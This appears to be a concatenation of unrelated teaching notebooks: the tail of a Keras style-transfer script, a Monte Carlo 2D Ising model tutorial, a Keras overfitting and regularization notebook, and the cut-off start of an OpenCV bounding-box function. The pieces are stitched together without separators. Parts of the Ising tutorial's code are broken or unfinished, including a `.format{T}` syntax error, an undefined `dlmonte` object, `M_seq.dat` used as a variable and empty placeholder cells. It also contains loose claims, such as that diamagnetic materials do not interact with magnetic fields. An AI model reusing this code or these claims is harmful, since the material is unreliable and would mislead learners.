x[:, :img_height - 1, :img_width - 1, :] -
x[:, 1:, :img_width - 1, :])
b = K.square(
x[:, :img_height - 1, :img_width - 1, :] -
x[:, :img_height - 1, 1:, :])
return K.sum(K.pow(a + b, 1.25))
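# Aside (plain NumPy, our addition): total variation penalizes
# neighbouring-pixel differences, so a constant image scores exactly zero
# and any spatial variation increases the penalty.
_const = np.ones((1, 4, 4, 3))
_da = np.square(_const[:, :3, :3, :] - _const[:, 1:, :3, :])
_db = np.square(_const[:, :3, :3, :] - _const[:, :3, 1:, :])
print('TV of a constant image:', np.sum(np.power(_da + _db, 1.25)))  # 0.0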
# Define the final loss to be minimized
outputs_dict = dict([(layer.name, layer.output) for layer in model.layers])
content_layer = 'block5_conv2'
style_layers = ['block1_conv1',
'block2_conv1',
'block3_conv1',
'block4_conv1',
'block5_conv1']
total_variation_weight = 1e-4
style_weight = 1.
content_weight = 0.025
loss = K.variable(0.)
layer_features = outputs_dict[content_layer]
target_image_features = layer_features[0, :, :, :]
combination_features = layer_features[2, :, :, :]
loss += content_weight * content_loss(target_image_features,
combination_features)
for layer_name in style_layers:
layer_features = outputs_dict[layer_name]
style_reference_features = layer_features[1, :, :, :]
combination_features = layer_features[2, :, :, :]
sl = style_loss(style_reference_features, combination_features)
loss += (style_weight / len(style_layers)) * sl
loss += total_variation_weight * total_variation_loss(combination_image)
# Set up the gradient-descent process
grads = K.gradients(loss, combination_image)[0]
fetch_loss_and_grads = K.function([combination_image], [loss, grads])
class Evaluator(object):
def __init__(self):
self.loss_value = None
self.grads_values = None
def loss(self, x):
assert self.loss_value is None
x = x.reshape((1, img_height, img_width, 3))
outs = fetch_loss_and_grads([x])
loss_value = outs[0]
grad_values = outs[1].flatten().astype('float64')
self.loss_value = loss_value
self.grad_values = grad_values
return self.loss_value
def grads(self, x):
assert self.loss_value is not None
grad_values = np.copy(self.grad_values)
self.loss_value = None
self.grad_values = None
return grad_values
evaluator = Evaluator()
# Style-transfer loop
from scipy.optimize import fmin_l_bfgs_b
from scipy.misc import imsave  # note: removed in SciPy 1.2+; use imageio.imwrite on newer installs
import time
result_prefix = 'my_result'
iterations = 20
x = preprocess_image(target_image_path)
x = x.flatten()
for i in range(iterations):
print('Start of iteration', i)
start_time = time.time()
x, min_val, info = fmin_l_bfgs_b(evaluator.loss,
x,
fprime=evaluator.grads,
maxfun=20)
print('Current loss value:', min_val)
img = x.copy().reshape((img_height, img_width, 3))
img = deprocess_image(img)
fname = result_prefix + '_at_iteration_%d.png' % i
imsave(fname, img)
print('Image saved as', fname)
end_time = time.time()
print('Iteration %d completed in %ds' % (i, end_time - start_time))
```
# Monte Carlo 2D Ising Model
Authors: Chris King, James Grant
This tutorial aims to help solidify your understanding of the theory underlying the Monte Carlo simulation technique by applying it to model the magnetic properties of a 2D material.
```
# import everything that we will need in this tutorial now
import numpy
import matplotlib.pyplot as plt
from inputs.Tut_2.sources.ising import IsingModel
from inputs.Tut_2.sources.isingdata import IsingModelData
```
## Introduction to Monte Carlo Methods:
Monte Carlo (MC) is the name given to the simulation technique that attempts to solve a problem by randomly sampling from all of its possible outcomes (its 'configurational space') and obtaining a result from numerical analysis of the sampling. MC is a stochastic method, which means that the final state of the system cannot be predicted precisely from the initial state and parameters, but reproducible results can nonetheless be obtained through numerical analysis. This contrasts with deterministic techniques such as molecular dynamics, where, if you know the initial state and the inputs for the calculations, you can predict the configuration of the system at any and all times thereafter. This distinction allows MC to be used in a variety of applications across the scientific community where deterministic techniques are ineffective or impossible to use, such as phase co-existence and criticality, adsorption, and the development of solid-state defects [1].
Results from MC simulations are generally accurate and reliable, provided that the technique has representatively sampled the distribution of possible configurations in the system. In other words, if our sampling method returns the probability distribution we expect, then we know that our sampling method is reliable. In thermodynamic systems, the probability distribution of available states is given by the Boltzmann distribution:
$$W(\mathbf{r}) = \exp {\Bigl(-\frac{E}{kT}\Bigr)}$$
where $W(\mathbf{r})$ is the probability, also known as the statistical weight, of being in a state of energy *E* at temperature *T*, and *k* is the Boltzmann constant. The ratio of Boltzmann distributions at two different energies, $E_2$ and $E_1$, is known as the Boltzmann factor:
$$\frac{W(\mathbf{r}_1)}{W(\mathbf{r}_2)} = \exp {\Bigl(\frac{E_2 -E_1}{kT}\Bigr)}$$
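As a quick numerical sanity check (with hypothetical energies, in units where $k = 1$), the Boltzmann factor can be computed directly:

```python
import numpy as np

def boltzmann_factor(E1, E2, kT=1.0):
    """Relative weight of a state with energy E1 vs one with energy E2."""
    return np.exp((E2 - E1) / kT)

# A state 1 energy unit lower is e ~ 2.72 times more likely at kT = 1
print(boltzmann_factor(1.0, 2.0, kT=1.0))
```

Note how the ratio grows exponentially as the energy gap widens or the temperature drops.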
So if our sampling method yields the Boltzmann distribution, we know that our simulation accurately reflects real systems. There are many possible ways to sample the configurational space of a simulated system; the most intuitive is simple random sampling, in which we move randomly from one configuration to another. However, this process is only reliable in systems with a uniform probability distribution of states, as it does not take into account the respective weighting of a given configuration. For example, it can under-represent a small number of configurations that contribute significantly to the overall state of the system.
The concept of statistical weight is crucial in thermodynamics and describes how likely a particular configuration is to be observed out of a hypothetically *large* number of replicas of that system. For instance, consider the possible configurations of the gas molecules in this room. Clearly, this system has a high probability of being in a configuration where the gas molecules are evenly (on average) distributed throughout the volume of the room, so this configuration has a high weighting. Yet there is also a configuration where every gas molecule sits in one corner of the room; this configuration is highly unlikely to be seen and so its weighting is very low. The weight of a particular configuration is given by:
$$W(\mathbf{r}) = \frac{\exp {\Bigl(\frac{- E(\mathbf{r})}{kT}\Bigr)}}{\sum_{i} \exp {\Bigl(\frac{- E(\mathbf{r_{i}})}{kT}\Bigr)} }$$
where $E(\mathbf{r})$ is the energy of a configuration $\mathbf{r}$. In MC simulations, the statistical weight of moving from a configuration, $\mathbf{r_1}$, to a new configuration, $\mathbf{r_2}$, is:
$$W(\mathbf{r}_1 \rightarrow \mathbf{r}_2) = \frac{W(\mathbf{r_1})P(\mathbf{r}_1 \rightarrow \mathbf{r}_2)}{N}$$
where $W(\mathbf{r_1})$ is the weight associated with $\mathbf{r}_1$, $P(\mathbf{r}_1 \rightarrow \mathbf{r}_2)$ is the probability of moving from configuration $\mathbf{r}_1$ to $\mathbf{r}_2$ and *N* is the number of possible configurations. The corresponding weight of going from $\mathbf{r}_2$ back to $\mathbf{r}_1$ is:
$$W(\mathbf{r}_2 \rightarrow \mathbf{r}_1) = \frac{W(\mathbf{r_2})P(\mathbf{r}_2 \rightarrow \mathbf{r}_1)}{N}$$
<img src="images/Tut_2_images/weights.png" height='400' width='600'/>
<div style="text-align: center">**Figure 1:** The associated statistical weights of moving between two configurations, A and B.</div>
There are more sophisticated ways of sampling configurational space, such as the Metropolis Algorithm, which is one of the most widely used sampling schemes in MC simulations (including this one). First, it randomly selects a particle in the system and proposes a move to another configuration. It then calculates the new energy of the configuration and compares it with the energy of the previous configuration before the move was proposed. It then applies the following condition:
$$P_{\mathrm{acc}}(\mathbf{r}_1 \rightarrow \mathbf{r}_2) = \min(1, \exp \ \Bigl(- \frac{E(\mathbf{r}_2) - E(\mathbf{r}_1)}{kT}\Bigr) \ )$$
where $P_{\mathrm{acc}}(\mathbf{r}_1 \rightarrow \mathbf{r}_2)$ is the probability of accepting the move from the initial configuration, $\mathbf{r}_1$, with an energy, $E(\mathbf{r}_1)$, to the new configuration, $\mathbf{r}_2$, with an energy, $E(\mathbf{r}_2)$. The function min() means that the smaller of the two values in the brackets is chosen. If the energy of the new configuration is less than that of the original, *i.e.* $E(\mathbf{r}_2) < E(\mathbf{r}_1)$, then $E(\mathbf{r}_2)-E(\mathbf{r}_1) < 0$, so $\exp \ \Bigl(- \frac{E(\mathbf{r}_2) - E(\mathbf{r}_1)}{kT}\Bigr) \ > 1$ and the move is accepted with $P_{\mathrm{acc}}(\mathbf{r}_1 \rightarrow \mathbf{r}_2) = 1$. If the new energy is greater than the energy of the original configuration, *i.e.* $E(\mathbf{r}_2) > E(\mathbf{r}_1)$, then $E(\mathbf{r}_2)-E(\mathbf{r}_1) > 0$, so $\exp \ \Bigl(- \frac{E(\mathbf{r}_2) - E(\mathbf{r}_1)}{kT}\Bigr) \ < 1$ and the move is accepted with probability $P_{\mathrm{acc}}(\mathbf{r}_1 \rightarrow \mathbf{r}_2) = \exp \ \Bigl(- \frac{E(\mathbf{r}_2) - E(\mathbf{r}_1)}{kT}\Bigr) \ < 1$.
<img src="images/Tut_2_images/Metropolis_algorithm.png" />
<div style="text-align: center">**Figure 2:** Visual representation of the function of the Metropolis algorithm. Once one move outcome is complete, the algorithm repeats on the final configuration. </div>
Even if the proposed move leads to a higher-energy configuration, there is still a non-zero probability of it being accepted! Why should this be the case?
```
a = input()
```
What happens to the total number of accepted moves in a given simulation as we change the temperature? How might this affect the final outcome of your simulation?
```
b = input()
```
This defines the concept of detailed balance:
$$W(\mathbf{r}_1 \rightarrow \mathbf{r}_2)P_{\mathrm{acc}}(\mathbf{r}_1 \rightarrow \mathbf{r}_2) = W(\mathbf{r}_2 \rightarrow \mathbf{r}_1)P_{\mathrm{acc}}(\mathbf{r}_2 \rightarrow \mathbf{r}_1)$$
We can now obtain the required Boltzmann distribution from this condition by rearrangement:
$$\frac{W(\mathbf{r}_2 \rightarrow \mathbf{r}_1)}{W(\mathbf{r}_1 \rightarrow \mathbf{r}_2)} = \frac{P_{\mathrm{acc}}(\mathbf{r}_1 \rightarrow \mathbf{r}_2)}{P_{\mathrm{acc}}(\mathbf{r}_2 \rightarrow \mathbf{r}_1)} = exp \ {\Bigl(\frac{E_2 -E_1}{kT}\Bigr)}$$
This tells us that so long as we satisfy detailed balance, our system will be sampled according to the Boltzmann distribution and obey the rules of thermodynamics. It is important to note, though, that the condition of detailed balance is *sufficient* but *not necessary* to ensure that our system accurately reflects thermodynamics, *i.e.* there are other, simpler conditions one could employ that would ensure that our simulation obeys thermodynamics. For instance, one could instead require only *balance*, which states that the total probability flux into any given state equals the total flux out of it, so the weight of each state is constant in time, *i.e.*:
$$\frac{\mathrm{d}W(\mathbf{r}_1)}{\mathrm{d}t} = 0$$
However, detailed balance also ensures equilibrium between all states such that the trajectory from one configuration to another via several steps has the same probability as the reverse trajectory. This ensures the reliability of the sampling method used without requiring additional corrections in the calculations.
<img src="images/Tut_2_images/detailed_balance2.png" height='700' width='700'/>
<div style="text-align: center">**Figure 3:** A visualisation of the difference between the condition of balance (left) and detailed balance (right) for a set of different configurations, A-H, in the configurational space of a system. </div>
Having discussed the concepts behind MC simulation methods, it is time to demonstrate how to apply them to a physical system. This tutorial will be centred on a MC simulation of the magnetic properties of solid materials.
## Ising Model of Magnetism
An application where MC is more effective than deterministic methods is simulating the magnetic behaviour of solid state materials.
Our simulation will be based on a 2D Ising model, which describes the macroscopic magnetic behaviour of a solid material as a result of the relative orientation of electron spins within the crystal lattice of a material. As you may recall, each electron has an intrinsic 'spin'. In simple terms, the spin of an electron can be thought of as a magnetic moment, with two possible orientations: 'up' and 'down'. This idea helps define two classes of magnetic materials: diamagnetic and paramagnetic.
Diamagnetic materials are made up of atoms/molecules without unpaired electrons and do not interact with external magnetic fields, making them non-magnetic. Paramagnetic materials contain unpaired electrons and so exhibit a net magnetic moment that can interact with external magnetic fields and give the material its magnetic properties. Figure 4 below shows an example of a paramagnetic material as a 2D lattice of colour-coded spins.
<img src="images/Tut_2_images/paramagnet_config.png" />
<div style="text-align: center">**Figure 4:** A 2D schematic of a paramagnetic material under an external magnetic field. Yellow indicates the spins that are aligned with the field and purple are spins that are anti-aligned. </div>
There is another type of magnetism observed, known as ferromagnetism, where instead of a uniform alignment of spins as in paramagnetic materials, 'domains' of aligned spins form, bounded by domains of oppositely aligned spins (see Figure 5). Ferromagnetic materials can show unique properties, such as being able to generate their own magnetic field (magnetisation) in the absence of an external magnetic field. These form the common magnets seen in real-world applications.
<img src="images/Tut_2_images/ferromagnet_cand2.png" />
<div style="text-align: center">**Figure 5:** A 2D schematic of a ferromagnetic material at $T < T_{c}$. Yellow and purple represent the two different spin orientations, 'up' and 'down', respectively. </div>
The main factor influencing whether a given atom's spin is aligned with its neighbours in a crystal, and hence what type of magnetism the material displays, is its exchange energy, *E*, which in the Ising model is given by:
$$E = -J \sum_{<i,j>} s_{i}s_{j}$$
where *J* is the coupling constant between adjacent atoms in a given material and $s_{i/j}$ is the spin of the particle in position i/j in the lattice, respectively. The <...> here mean the sum goes over the nearest neighbours of the atom in position (i,j), *i.e.* over the atoms at positions (i-1, j), (i+1, j), (i, j-1) and (i, j+1) only. The sign of *J* determines whether spin alignment (ferromagnetism) or anti-alignment (antiferromagnetism) is favourable.
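As an illustration, the exchange energy of a whole lattice can be evaluated with numpy. This is a hedged sketch assuming periodic boundary conditions; the tutorial's own `IsingModel` class may implement it differently:

```python
import numpy as np

def ising_energy(spins, J=1.0):
    """Total exchange energy of a 2D spin lattice (+1/-1) with periodic boundaries.

    Each nearest-neighbour pair is counted exactly once by summing each site's
    interaction with its right and lower neighbour only.
    """
    right = np.roll(spins, -1, axis=1)
    down = np.roll(spins, -1, axis=0)
    return -J * np.sum(spins * right + spins * down)

# An all-aligned 4x4 lattice has 2*16 = 32 bonds, each contributing -J
spins = np.ones((4, 4), dtype=int)
print(ising_energy(spins))   # -32.0
```

With $J > 0$ the aligned lattice minimises the energy; a checkerboard of alternating spins gives the opposite sign, $+32J$.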
The exchange energy can be thought of as an activation barrier for an atom to change its spin depending on the spins of its neighbours. This means that, like with any physical system with an energy barrier, spontaneous thermal fluctuations can overcome the barrier and cause some atoms/domains to flip their spin, with the likelihood of flipping a spin increasing as temperature increases. Therefore, ferromagnetic materials only show domains at temperatures under a specific critical, or Curie, temperature, $T_{c}$.
Above this point, ferromagnetic materials lose their ability to retain magnetisation because the thermal fluctuations are much larger than the energy required to switch a domain's alignment with respect to other domains. This results in a loss of the domain structure, and hence loss of magnetisation without an external field. It is for this reason that paramagnetism can be thought of as high-temperature ferromagnetism.
For more information on the Ising model, consult either [2] or [3].
The Metropolis algorithm is employed in these simulations; describe what constitutes a 'move' in the context of this system.
```
c = input()
```
Write an expression for the energy difference between the initial and final configurations, $E(\mathbf{r}_2) - E(\mathbf{r}_1)$, for the 2D Ising model.
```
d = input()
```
### Exercise 1)
The aim of this exercise is to familiarise yourself with running MC calculations on a simple 2D Ising model of a ferromagnetic material. The material is represented by a 64x64 2D lattice of points, each representing an atom with its own net spin. In this exercise, all atoms start spin-aligned. We will be running an MC simulation to look at how the overall spin alignment (magnetisation) and energy of the system evolve with both time and temperature.
First, we shall set up our initial simulation at a given temperature:
```
data = dlmonte.DLMonteData("")
```
Now let's run our first Monte Carlo simulation of the day!
```
# Run the initial simulation. Takes about a minute to complete
```
If you wish, you can look in your directory and see several new files have appeared. The nature of these files will be explained in detail next session.
Now that you have all the output data you could possibly need from this calculation, we shall proceed with extracting the time evolution of magnetisation and the distribution of the magnetisations over the course of the simulation.
```
# output data extraction and analysis into plots of magnetisation vs time and histogram of magnetisation distributions
T = 2.36
plt.figure()
plt.subplot(1,2,1)
plt.xlabel("Number of steps")
plt.ylabel("Magnetisation")
plt.title("Time evolution of magnetisation at T = {}".format(T))
plt.axis()
plt.plot(M_seq.dat, 'b-')
plt.savefig("inputs/Tut_2/main/{}/Mvst.png".format(T))
plt.subplot(1,2,2)
plt.xlabel("M")
plt.ylabel("P(M)")
plt.title("Distribution of magnetisations at T = {}".format(T))
plt.hist(M_seq.dat, bins='auto', density=True)  # 'normed' was renamed to 'density' in newer Matplotlib
plt.savefig("inputs/Tut_2/main/{}/M_hist.png".format(T))
```
You will find several new files in your directory, but we have used only M_seq.dat and M_hist.dat in this exercise (we will get to the others later).
We shall now proceed to run the calculation at higher temperatures to obtain the temperature-dependence of the magnetisation. Repeat the simulation and analysis sections that you have done for this initial temperature with the other temperatures in the main directory.
Compare the evolution of magnetisation as the temperature changes and rationalise any observed trends using your knowledge of ferromagnetism. Do the results correspond to the Ising model?
```
e = input()
```
Compare the shapes of your magnetisation histograms as the temperature changes. What does this indicate is happening to your system as temperature changes? Does this behaviour support the Ising model and your magnetisation evolution data?
```
f = input()
```
Once you have done that, plot magnetisation vs temperature for the system. Comment on the shape of your graph and estimate the critical temperature, $T_{c}$, from it.
```
# collate all magnetisation-temperature data and plot it
plt.figure()
plt.xlabel("Temperature")
plt.ylabel("Average Magnetisation")
plt.title("Magnetisation vs Temperature")
#plt.axis()
plt.plot(x1, y1, 'b-')
plt.savefig("inputs/Tut_2/main/<M>vsT.png".format{T})
g = input()
```
For any square 2D Ising model where the couplings along rows and along columns are equal, $T_{c}$ is given (in units where $J = k = 1$) by:
$$T_{c} = \frac{2}{\ln(1+\sqrt{2})} \approx 2.269$$
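This analytic value (Onsager's exact result for the square lattice, quoted in units where $J = k = 1$) can be checked directly:

```python
import numpy as np

# Exact critical temperature of the square-lattice Ising model
T_c = 2.0 / np.log(1.0 + np.sqrt(2.0))
print(round(T_c, 3))   # 2.269
```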
Does your estimation of $T_{c}$ agree with that predicted by the above equation? Account for any observed discrepancies. How could you improve the accuracy of your estimated value for $T_{c}$?
```
h = input()
```
### Extension (optional):
You have seen what happens as the system is heated, but you can also look at the magnetisation upon cooling the system from a state above the critical temperature to a state below the critical temperature.
Go back to the beginning of Exercise 1 and now choose the inputs in ------- and plot the time-evolution of magnetisation.
How does this compare with the time evolution at $T>T_{c}$? Does this agree with the Ising model? If not, what do you think might be the problem with our simulation?
```
i = input()
```
### Exercise 2)
This exercise will demonstrate the stochastic nature of MC simulations as well as how the Metropolis algorithm produces reliable and accurate results for this simple 2D Ising model.
We have seen what happens when we start the simulations from a fixed starting configuration (all spins aligned), but what will happen when we start from a random configuration?
Go back to the beginning of Exercise 1 and repeat it for each temperature in the 'ranseed' folder, plotting the magnetisation vs. temperature once you have run all the simulations.
How do the results from this exercise compare with those of Exercise 1? What effect does the initial configuration have on the outcome of the simulation?
```
j = input()
```
### Extension (optional):
For one of the ranseed calculations, let us find out what the initial configuration was and use that as our fixed starting configuration and see how the results of both calculations compare. Using your current ranseed calculation, we will extract the initial configuration and set it as the starting configuration in the CONTROL file:
```
# pull out seeds, copy input files into a new directory, change ranseed to seeds in output
```
Now let's run this calculation:
```
# Run calculations here
```
We can compare the magnetisation data between the ranseed and this new simulation:
```
# plot both magnetisations on the same graph
plt.figure()
plt.xlabel("Number of steps")
plt.ylabel("Magnetisation")
plt.title("Time evolution of magnetisation at T = {} for a randomly-generated initial state and the equivalent fixed initial state".format(T))
plt.axis()
plt.plot(x1, y1, 'b-', label='random')
plt.plot(x2, y2, 'r-', label='fixed')
plt.legend()
plt.savefig("inputs/Tut_2/extensions/ranseed/Mvst_comparison.png")
```
What do you notice about the magnetisation evolution in the two calculations? Does this confirm that the stochastic nature of Monte Carlo methods can produce reliable results?
```
k = input()
```
## Conclusions:
Now that you have reached the end of this tutorial, you will hopefully have a better understanding of the Monte Carlo method and the motivation for its use. You have simulated the magnetic properties of a 2D material based on the Ising model and obtained:
- the temperature-dependence of magnetisation
- the evolution of magnetisation with time
- validation of the stochastic nature of Monte Carlo methods
In the next tutorial, you will be introduced to a general Monte Carlo program called DLMONTE and use it to model the thermal properties of a Lennard-Jones material.
## Extensions (optional):
### 1. Antiferromagnetism:
So far, you have looked at how the magnetic behaviour of a ferromagnetic system changes over time and temperature, but there is another possible type of magnetism called antiferromagnetism, in which the coupling constant, *J*, changes sign. This means that it is now favourable for the spin of one atom to be opposed to the spin of its neighbours, resulting in a preferred 'checkerboard' pattern of magnetisation on the 2D lattice (see Figure 6). You can investigate the magnetic behaviour in this case using the 2D Ising model.
<img src="images/Tut_2_images/antiferromagnet.png" />
<div style="text-align: center">**Figure 6:** The most stable magnetic configuration of an antiferromagnetic material at $T < T_{c}$. </div>
Repeat Exercise 1 but this time using the inputs in the 'antiferromagnet' folder, plotting the temperature dependence of the magnetisation once you have run the simulation at each temperature.
Compare your results of the antiferromagnet with the ferromagnet. Rationalise any observed differences in terms of exchange energy and alignment of spins.
```
l = input()
```
## References:
[1] S. Mordechai (Editor), *Applications of Monte Carlo Method in Science and Engineering* [Online]. Available: https://www.intechopen.com/books/applications-of-monte-carlo-method-in-science-and-engineering
[2] J. V. Selinger, "Ising Model for Ferromagnetism" in *Introduction to the Theory of Soft Matter: From Ideal Gases to Liquid Crystals*. Cham: Springer International Publishing, 2016, pp. 7-24.
[3] N. J. Giordano, *Computational Physics*. Upper Saddle River, N.J.: Prentice Hall, 1997.
# Overfitting and underfitting
The fundamental issue in machine learning is the tension between optimization and generalization. "Optimization" refers to the process of adjusting a model to get the best performance possible on the training data (the "learning" in "machine learning"), while "generalization" refers to how well the trained model would perform on data it has never seen before. The goal of the game is to get good generalization, of course, but you do not control generalization; you can only adjust the model based on its training data.
Note: in this notebook we will be using the IMDB test set as our validation set. It doesn't matter in this context.
```
from keras.datasets import imdb
import numpy as np
(train_data, train_labels), (test_data, test_labels) = imdb.load_data(num_words=10000)
def vectorize_sequences(sequences, dimension=10000):
    # Create an all-zero matrix of shape (len(sequences), dimension)
    results = np.zeros((len(sequences), dimension))
    for i, sequence in enumerate(sequences):
        results[i, sequence] = 1.  # set specific indices of results[i] to 1s
    return results
# Our vectorized training data
x_train = vectorize_sequences(train_data)
# Our vectorized test data
x_test = vectorize_sequences(test_data)
# Our vectorized labels
y_train = np.asarray(train_labels).astype('float32')
y_test = np.asarray(test_labels).astype('float32')
```
# Fighting overfitting
## Reducing the network's size
Unfortunately, there is no magical formula to determine what the right number of layers is, or what the right size for each layer is. You will have to evaluate an array of different architectures (on your validation set, not on your test set, of course) in order to find the right model size for your data. The general workflow to find an appropriate model size is to **start with relatively few layers and parameters, and start increasing the size of the layers or adding new layers until you see diminishing returns** with regard to the validation loss.
Let's try this on our movie review classification network. Our original network was as such:
```
from keras import models
from keras import layers
original_model = models.Sequential()
original_model.add(layers.Dense(16, activation='relu', input_shape=(10000,)))
original_model.add(layers.Dense(16, activation='relu'))
original_model.add(layers.Dense(1, activation='sigmoid'))
original_model.compile(optimizer='rmsprop',
loss='binary_crossentropy',
metrics=['acc'])
```
Now let's try to replace it with this smaller network:
```
smaller_model = models.Sequential()
smaller_model.add(layers.Dense(4, activation='relu', input_shape=(10000,)))
smaller_model.add(layers.Dense(4, activation='relu'))
smaller_model.add(layers.Dense(1, activation='sigmoid'))
smaller_model.compile(optimizer='rmsprop',
loss='binary_crossentropy',
metrics=['acc'])
```
### Comparison
Here's a comparison of the validation losses of the original network and the smaller network. The dots are the validation loss values of the smaller network, and the crosses are the initial network (remember: a lower validation loss signals a better model).
```
original_hist = original_model.fit(x_train, y_train,
epochs=20,
batch_size=512,
validation_data=(x_test, y_test))
smaller_model_hist = smaller_model.fit(x_train, y_train,
epochs=20,
batch_size=512,
validation_data=(x_test, y_test))
epochs = range(1, 21)
original_val_loss = original_hist.history['val_loss']
smaller_model_val_loss = smaller_model_hist.history['val_loss']
import matplotlib.pyplot as plt
# b+ is for "blue cross"
plt.plot(epochs, original_val_loss, 'b+', label='Original model')
# "bo" is for "blue dot"
plt.plot(epochs, smaller_model_val_loss, 'bo', label='Smaller model')
plt.xlabel('Epochs')
plt.ylabel('Validation loss')
plt.legend()
plt.show()
```
Now, for kicks, let's add to this benchmark a network that has much more capacity, far more than the problem would warrant:
```
bigger_model = models.Sequential()
bigger_model.add(layers.Dense(512, activation='relu', input_shape=(10000,)))
bigger_model.add(layers.Dense(512, activation='relu'))
bigger_model.add(layers.Dense(1, activation='sigmoid'))
bigger_model.compile(optimizer='rmsprop',
loss='binary_crossentropy',
metrics=['acc'])
bigger_model_hist = bigger_model.fit(x_train, y_train,
epochs=20,
batch_size=512,
validation_data=(x_test, y_test))
```
Here's how the bigger network fares compared to the reference one. The dots are the validation loss values of the bigger network, and the crosses are the initial network.
```
bigger_model_val_loss = bigger_model_hist.history['val_loss']
plt.plot(epochs, original_val_loss, 'b+', label='Original model')
plt.plot(epochs, bigger_model_val_loss, 'bo', label='Bigger model')
plt.xlabel('Epochs')
plt.ylabel('Validation loss')
plt.legend()
plt.show()
```
Meanwhile, here are the training losses for our two networks:
```
original_train_loss = original_hist.history['loss']
bigger_model_train_loss = bigger_model_hist.history['loss']
plt.plot(epochs, original_train_loss, 'b+', label='Original model')
plt.plot(epochs, bigger_model_train_loss, 'bo', label='Bigger model')
plt.xlabel('Epochs')
plt.ylabel('Training loss')
plt.legend()
plt.show()
```
## Adding weight regularization
A "simple model" in this context is a model where the distribution of parameter values has less entropy (or a model with fewer parameters altogether, as we saw in the section above). Thus a common way to mitigate overfitting is to put constraints on the complexity of a network by forcing its weights to only take small values, which makes the distribution of weight values more "regular". This is called "weight regularization", and it is done by adding to the loss function of the network a cost associated with having large weights. This cost comes in two flavors:
- L1 regularization, where the cost added is proportional to the absolute value of the weights coefficients (i.e. to what is called the "L1 norm" of the weights).
- L2 regularization, where the cost added is proportional to the square of the value of the weights coefficients (i.e. to what is called the "L2 norm" of the weights). L2 regularization is also called weight decay in the context of neural networks. Don't let the different name confuse you: weight decay is mathematically the exact same as L2 regularization.
```
from keras import regularizers
l2_model = models.Sequential()
l2_model.add(layers.Dense(16, kernel_regularizer=regularizers.l2(0.001),
activation='relu', input_shape=(10000,)))
l2_model.add(layers.Dense(16, kernel_regularizer=regularizers.l2(0.001),
activation='relu'))
l2_model.add(layers.Dense(1, activation='sigmoid'))
l2_model.compile(optimizer='rmsprop',
loss='binary_crossentropy',
metrics=['acc'])
```
Here's the impact of our L2 regularization penalty:
```
l2_model_hist = l2_model.fit(x_train, y_train,
epochs=20,
batch_size=512,
validation_data=(x_test, y_test))
l2_model_val_loss = l2_model_hist.history['val_loss']
plt.plot(epochs, original_val_loss, 'b+', label='Original model')
plt.plot(epochs, l2_model_val_loss, 'bo', label='L2-regularized model')
plt.xlabel('Epochs')
plt.ylabel('Validation loss')
plt.legend()
plt.show()
```
As alternatives to L2 regularization, you could use one of the following Keras weight regularizers:
```
from keras import regularizers
# L1 regularization
regularizers.l1(0.001)
# L1 and L2 regularization at the same time
regularizers.l1_l2(l1=0.001, l2=0.001)
```
## Adding dropout
Dropout is one of the most effective and most commonly used regularization techniques for neural networks, developed by Hinton and his students at the University of Toronto. Dropout, applied to a layer, consists of randomly "dropping out" (i.e. setting to zero) a number of output features of the layer during training. Let's say a given layer would normally have returned a vector [0.2, 0.5, 1.3, 0.8, 1.1] for a given input sample during training; after applying dropout, this vector will have a few zero entries distributed at random, e.g. [0, 0.5, 1.3, 0, 1.1]. The "dropout rate" is the fraction of the features that are being zeroed-out; it is usually set between 0.2 and 0.5. At test time, no units are dropped out, and instead the layer's output values are scaled down by a factor equal to the dropout rate, so as to balance for the fact that more units are active than at training time.
Consider a Numpy matrix containing the output of a layer, `layer_output`, of shape `(batch_size, features)`. At training time, we would zero out at random a fraction of the values in the matrix.
At training time, we drop out 50% of the units in the output:
`layer_output *= np.random.randint(0, high=2, size=layer_output.shape)`
At test time, we scale the output down by the same factor:
`layer_output *= 0.5`
Alternatively, both operations can be done at training time, leaving the output unchanged at test time. At training time:
`layer_output *= np.random.randint(0, high=2, size=layer_output.shape)`
Note that we are scaling *up* rather than scaling *down* in this case:
`layer_output /= 0.5`
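The second variant above (scaling up at training time, often called "inverted dropout") can be demonstrated on a small random matrix. This is a toy sketch; in practice Keras handles all of this internally:

```python
import numpy as np

rng = np.random.default_rng(42)
layer_output = rng.random((2, 4))   # toy activations, shape (batch_size, features)

rate = 0.5
mask = rng.integers(0, 2, size=layer_output.shape)  # 1 = keep, 0 = drop
dropped = layer_output * mask / (1.0 - rate)        # zero out, then scale up surviving units

# Roughly half the entries are zeroed; the survivors are doubled,
# so the expected magnitude of the output is preserved
print(dropped)
```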
In Keras you can introduce dropout in a network via the Dropout layer, which is applied to the output of the layer right before it, e.g.:
model.add(layers.Dropout(0.5))
Let's add two Dropout layers in our IMDB network to see how well they do at reducing overfitting:
```
dpt_model = models.Sequential()
dpt_model.add(layers.Dense(16, activation='relu', input_shape=(10000,)))
dpt_model.add(layers.Dropout(0.5))
dpt_model.add(layers.Dense(16, activation='relu'))
dpt_model.add(layers.Dropout(0.5))
dpt_model.add(layers.Dense(1, activation='sigmoid'))
dpt_model.compile(optimizer='rmsprop',
loss='binary_crossentropy',
metrics=['acc'])
dpt_model_hist = dpt_model.fit(x_train, y_train,
epochs=20,
batch_size=512,
validation_data=(x_test, y_test))
```
Let's plot the results:
```
dpt_model_val_loss = dpt_model_hist.history['val_loss']
plt.plot(epochs, original_val_loss, 'b+', label='Original model')
plt.plot(epochs, dpt_model_val_loss, 'bo', label='Dropout-regularized model')
plt.xlabel('Epochs')
plt.ylabel('Validation loss')
plt.legend()
plt.show()
```
## Conclusion
- The general workflow to find an appropriate model size is to start with relatively few layers and parameters, and start increasing the size of the layers or adding new layers until you see diminishing returns with regard to the validation loss.
Here the most common ways to prevent overfitting in neural networks:
- Getting more training data.
- Reducing the capacity of the network.
- Adding weight regularization.
- Adding dropout.
# Bounding box using numpy
```
import numpy as np
from skimage import transform
import matplotlib.pyplot as plt
import cv2
def fill_oriented_bbox(img, fill_threshold=None, color=1):
    # findContours returns (image, contours, hierarchy) in OpenCV 3 but
    # (contours, hierarchy) in OpenCV 4; taking [-2] works for both versions
    contours = cv2.findContours(img, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[-2]
    out = np.zeros_like(img, dtype=np.uint8)
    for cnt in contours:
        # Compute the oriented bounding box
        rect = cv2.minAreaRect(cnt)
        box = cv2.boxPoints(rect)
        box = np.int0(box)
        obbox = np.zeros_like(img, dtype=np.uint8)
        cv2.fillPoly(obbox, [box], color)
        if fill_threshold is not None:
            # Fill the contour so we can compare it to the oriented bounding box later
            cnt_fill = np.zeros_like(img, dtype=np.uint8)
